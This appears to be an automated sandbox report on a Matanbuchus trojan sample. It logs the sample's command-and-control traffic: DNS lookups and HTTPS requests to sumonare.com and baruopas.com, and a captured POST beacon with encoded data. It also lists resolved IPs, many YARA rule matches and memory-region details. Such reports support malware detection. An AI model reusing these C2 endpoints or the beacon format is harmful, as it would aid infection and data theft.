            Source: global trafficHTTP traffic detected: GET /projects/index.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: sumonare.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /projects/index.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: sumonare.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /projects/index.aspx HTTP/1.1User-Agent: Microsoft-WNS/11.0Host: sumonare.comCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: baruopas.com
            Source: global trafficDNS traffic detected: DNS query: sumonare.com
            Source: unknownHTTP traffic detected: POST /projects/cloud-solutions/api-v2/index.php HTTP/1.1User-Agent: Microsoft-WNS/10.0Host: sumonare.comContent-Length: 521Content-Type: application/x-www-form-urlencodedAccept-Language: fr-CAData Raw: 64 61 74 61 3d 65 79 4a 42 62 6c 64 47 61 43 49 36 49 6a 42 36 54 43 39 42 55 31 4a 46 5a 33 67 79 4d 55 74 68 63 54 68 73 62 47 4d 39 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 6c 70 4d 6c 56 47 56 6a 68 75 62 46 4a 32 5a 46 46 30 54 7a 68 6e 51 30 39 71 4e 6c 64 7a 50 53 49 73 49 6b 68 6b 56 6c 46 77 51 53 49 36 49 6e 70 6f 61 6d 4e 46 5a 33 67 30 64 6d 70 35 59 79 49 73 49 6c 46 47 57 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 55 78 5a 55 35 5a 62 47 73 34 49 69 77 69 55 6d 4a 76 64 43 49 36 49 6a 4a 44 53 48 4a 48 51 33 68 5a 62 55 46 35 5a 79 49 73 49 6c 4e 69 57 6c 64 75 57 43 49 36 49 6e 64 70 5a 6a 46 5a 62 45 6b 32 4e 33 63 39 50 53 49 73 49 6c 6c 72 53 6c 63 69 4f 6c 73 69 64 32 64 6d 56 69 4a 64 4c 43 4a 6a 5a 6b 74 59 49 6a 6f 69 64 58 63 39 50 53 49 73 49 6d 68 4f 62 33 5a 4b 62 53 49 36 49 6e 68 6e 50 54 30 69 4c 43 4a 76 51 6e 56 4e 56 58 55 69 4f 69 49 32 55 6e 70 58 55 46 49 35 64 58 4e 70 63 57 49 69 4c 43 4a 7a 64 48 56 5a 49 6a 6f 69 64 44 45 72 51 56 6c 6e 50 54 30 69 4c 43 4a 32 62 30 70 6a 49 6a 6f 69 4b 31 46 49 65 6b 31 42 50 54 30 69 4c 43 4a 33 51 57 4e 49 49 6a 6f 69 65 56 46 6d 57 45 31 6e 59 7a 55 72 56 32 35 6c 55 33 4d 72 61 43 49 73 49 6e 64 52 5a 56 4a 49 49 6a 6f 69 64 56 5a 78 57 6b 56 52 53 69 73 69 4c 43 4a 34 5a 55 4e 6a 61 6c 4d 69 4f 69 4a 36 5a 33 4a 56 54 32 64 56 50 53 49 73 49 6e 6c 70 61 56 56 59 57 53 49 36 49 6e 70 47 56 47 78 43 51 55 70 72 63 33 70 68 53 45 4e 69 4d 30 4e 32 4d 6d 5a 61 4e 48 64 35 4d 6c 68 4d 54 54 46 53 55 58 64 4d 63 46 46 6e 55 6e 4d 35 4d 6b 52 48 4d 6d 4d 39 49 6e 30 3d Data Ascii: data=eyJBbldGaCI6IjB6TC9BU1JFZ3gyMUthcThsbGM9IiwiRnN0TCI6InlpMlVGVjhubFJ2ZFF0TzhnQ09qNldzPSIsIkhkVlFwQSI6InpoamNFZ3g0dmp5YyIsIlFGWnlpaVVYWSI6InUxZU5ZbGs4IiwiUmJvdCI6IjJDSHJHQ3hZbUF5ZyIsIlNiWlduWCI6IndpZjFZbEk2N3c9PSIsIllrSlciOlsid2dmViJdLCJjZktYIjoidXc9PSIsImhOb3ZKbSI6InhnPT0iLCJvQnVNVXUiOiI2UnpXUFI5dXNpcWIiLCJzdHVZIjoidDErQVlnPT0iLCJ2b0pjIjoiK1FIek1BPT0iLCJ3QWNIIjoieVFmWE1nYzUrV25lU3MraCIsIndRZVJIIjoidVZxWkVRSisiLCJ4ZUNjalMiOiJ6Z3JVT2dVPSIsInlpaVVYWSI6InpGVGxCQUprc3phSENiM0N2MmZaNHd5MlhMTTFSUXdMcFFnUnM5MkRHMmM9In0=
            Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sumonare.com/
            Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sumonare.com/projects/index.aspx
            Source: rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sumonare.com/projects/index.aspxh=
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
            Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
            Source: unknownHTTPS traffic detected: 194.67.193.13:443 -> 192.168.2.7:49700 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49701 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49702 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49704 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 194.67.193.12:443 -> 192.168.2.7:49770 version: TLS 1.2

            System Summary

            barindex
            Source: useraccount.aspx.dll, type: SAMPLEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 18.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 13.2.rundll32.exe.6cef0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 22.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 36.2.regsvr32.exe.6b4a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 13.2.rundll32.exe.52c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 13.2.rundll32.exe.52c0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 0000000D.00000002.2509315820.0000000005558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 00000024.00000002.1656219825.000000007F0B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 00000024.00000002.1655827113.000000006B4A1000.00000020.00000001.01000000.00000008.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 0000000D.00000002.2509711565.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 00000012.00000002.1540406288.000000007F770000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 0000000D.00000002.2508577528.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 00000012.00000002.1539682378.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 00000024.00000002.1655732587.00000000050B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 00000012.00000002.1539552118.0000000004B77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_4ce9affb Author: unknown
            Source: 0000000D.00000002.2510567036.000000007ED90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: 00000016.00000002.1663869871.000000006CEF1000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: C:\Users\user\8f08\user-PC\user-PC.ocx, type: DROPPEDMatched rule: Windows_Trojan_Matanbuchus_58a61aaa Author: unknown
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_6CF20D9013_2_6CF20D90
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_6CF5EED013_2_6CF5EED0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_6CF615B013_2_6CF615B0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_6CF4B28013_2_6CF4B280
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF1D6013_2_7EDF1D60
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE76F013_2_7EDE76F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDED20013_2_7EDED200
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDBF22013_2_7EDBF220
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB90BD13_2_7EDB90BD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFE17913_2_7EDFE179
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFBFC013_2_7EDFBFC0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE3FA013_2_7EDE3FA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE0FD8B13_2_7EE0FD8B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE1EAAE13_2_7EE1EAAE
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE13A7D13_2_7EE13A7D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE0FA2613_2_7EE0FA26
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDDEA2013_2_7EDDEA20
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE76F013_2_7EDE76F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE58DA13_2_7EDE58DA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE0895D13_2_7EE0895D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE0A90013_2_7EE0A900
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDDD6D013_2_7EDDD6D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE0F69813_2_7EE0F698
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFA7DC13_2_7EDFA7DC
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDDF74413_2_7EDDF744
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDF84C013_2_7EDF84C0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE049013_2_7EDE0490
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFB44F13_2_7EDFB44F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDD558D13_2_7EDD558D
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE1736C13_2_7EE1736C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE0435013_2_7EE04350
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB731013_2_7EDB7310
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE60E013_2_7EDE60E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFB00513_2_7EDFB005
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDE318013_2_7EDE3180
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDFA1B913_2_7EDFA1B9
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7D9F7018_2_7F7D9F70
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B0FF018_2_7F7B0FF0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7DBFC018_2_7F7DBFC0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C3FA018_2_7F7C3FA0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7B6D4018_2_7F7B6D40
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C4D0018_2_7F7C4D00
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C76F018_2_7F7C76F0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7BD6D018_2_7F7BD6D0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7AF69018_2_7F7AF690
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7E435018_2_7F7E4350
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F79731018_2_7F797310
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7CD20018_2_7F7CD200
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C318018_2_7F7C3180
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7C60E018_2_7F7C60E0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_6B5115B036_2_6B5115B0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F103FA036_2_7F103FA0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F11BFC036_2_7F11BFC0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F0FF036_2_7F0F0FF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EF69036_2_7F0EF690
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F1076F036_2_7F1076F0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D4036_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D731036_2_7F0D7310
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F12435036_2_7F124350
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10D20036_2_7F10D200
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10318036_2_7F103180
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F1060E036_2_7F1060E0
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7F7F17CD appears 126 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7F7E3810 appears 31 times
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 7EE117CD appears 150 times
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 7F1317CD appears 132 times
            Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7584 -s 612
            Source: useraccount.aspx.dllStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE, DLL
            Source: useraccount.aspx.dll, type: SAMPLEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: sslproxydump.pcap, type: PCAPMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 36.2.regsvr32.exe.7f0b0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 13.2.rundll32.exe.7ed90000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 13.2.rundll32.exe.7ed90000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 36.2.regsvr32.exe.7f0b0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 18.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 13.2.rundll32.exe.6cef0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 22.2.rundll32.exe.6cef0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 18.2.rundll32.exe.7f770000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 36.2.regsvr32.exe.6b4a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 13.2.rundll32.exe.52c0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
            Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_4ce9affb reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 61d32df2ea730343ab497f50d250712e89ec942733c8cc4421083a3823ab9435, id = 4ce9affb-58ef-4d31-b1ff-5a1c52822a01, last_modified = 2022-04-12
            Source: 18.2.rundll32.exe.7f770000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Matanbuchus_58a61aaa reference_sample = 4eb85a5532b98cbc4a6db1697cf46b9e2b7e28e89d6bbfc137b36c0736cd80e2, os = windows, severity = x86, creation_date = 2022-03-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Matanbuchus, fingerprint = 332794db0ed7488e939a91594d2100ee013a7f8f91afc085e15f06fc69098ad5, id = 58a61aaa-51b2-47f2-ab32-2e639957b2d5, last_modified = 2022-04-12
